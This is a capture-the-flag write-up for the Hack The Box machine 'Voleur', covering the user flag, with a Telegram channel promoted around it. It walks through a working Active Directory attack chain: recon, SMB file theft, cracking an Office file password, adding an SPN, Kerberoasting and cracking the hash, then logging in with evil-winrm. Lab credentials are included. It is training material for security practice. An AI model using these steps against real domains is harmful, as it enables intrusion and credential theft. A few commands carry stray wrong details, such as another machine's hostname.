Skip to content

Voleur - Hack The Box

Platform: Windows

IP: 10.129.29.242

Difficulty: Medium

Author: NoSec

🚨 Follow live on HTB – leaks, drops, and deep writeups
👉 t.me/nosecpwn
Don't just read. Join us.

Recon

nmap -sV -sC -Pn 10.129.29.242

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 10:16 CEST
Nmap scan report for 10.129.29.242
Host is up (0.063s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 16:16:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

We receive a default username/password for the machine:

ryan.naylor / HollowOct31Nyt

Edit the hosts file:

sudo nano /etc/hosts
10.129.29.242       voleur.htb dc.voleur.htb

Time synchronization is important:

sudo rdate -n RUSTYKEY.HTB

Kerberos

Set krb5.conf:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    VOLEUR.HTB = {
        kdc = 10.129.29.242
        admin_server = 10.129.29.242
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Obtain Kerberos ticket (TGT):

kinit ryan.naylor@VOLEUR.HTB

Kerberos SMB connection with Impacket:

export KRB5CCNAME=ryan.ccache
smbclient.py -k -no-pass -dc-ip 10.129.180.134 VOLEUR.HTB/ryan.naylor@dc.voleur.htb

Download the file Access_Review.xlsx:

get Acces_Review.xlsx

Crack the file (office2john + john):

office2john Access_Review.xlsx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password:

fo<passw>

Decode the content:

pip install msoffcrypto-tool
msoffcrypto-tool Access_Review.xlsx decrypted.xlsx -p fo<pass>
xlsx2csv decrypted.xlsx access.csv
cat access.csv

File Contents

User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!


Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - [REDACTED]
svc_iis,,IIS Administration,P/W - [REDACTED]
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.

Create an SPN for the svc_winrm account:

cat > addspn.ldif << 'EOF'
dn: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/voleur.htb
EOF

ldapmodify -x   -H ldap://10.129.29.242   -D "svc_ldap@voleur.htb"   -w "M1<pass>"   -f addspn.ldif

Extract and crack the hash:

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py   -k -request -request-user svc_winrm   -dc-ip 10.129.29.242   -dc-host dc.voleur.htb   voleur.htb/svc_ldap > tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFire<pass> (?)     
1g 0:00:00:05 DONE (2025-07-06 21:12) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AHANACK6978012..ADDRESS1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracked password:

AFire<pass>

Save TGT and export:

impacket-getTGT 'VOLEUR.HTB/SVC_WINRM:AFire<pass>'
export KRB5CCNAME=SVC_WINRM.ccache

Log in via evil-winrm and grab the user flag:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\svc_winrm> cd Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ls


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  10:33 AM             34 user.txt

User flag acquired!

🔐 The root section is available only in our private Telegram group as long as the machine is active in Season 8.
👉 Join us for the full writeup, extra tips, and insider content:
📡 https://t.me/nosecpwn)

© 2025 NoSec. All rights reserved.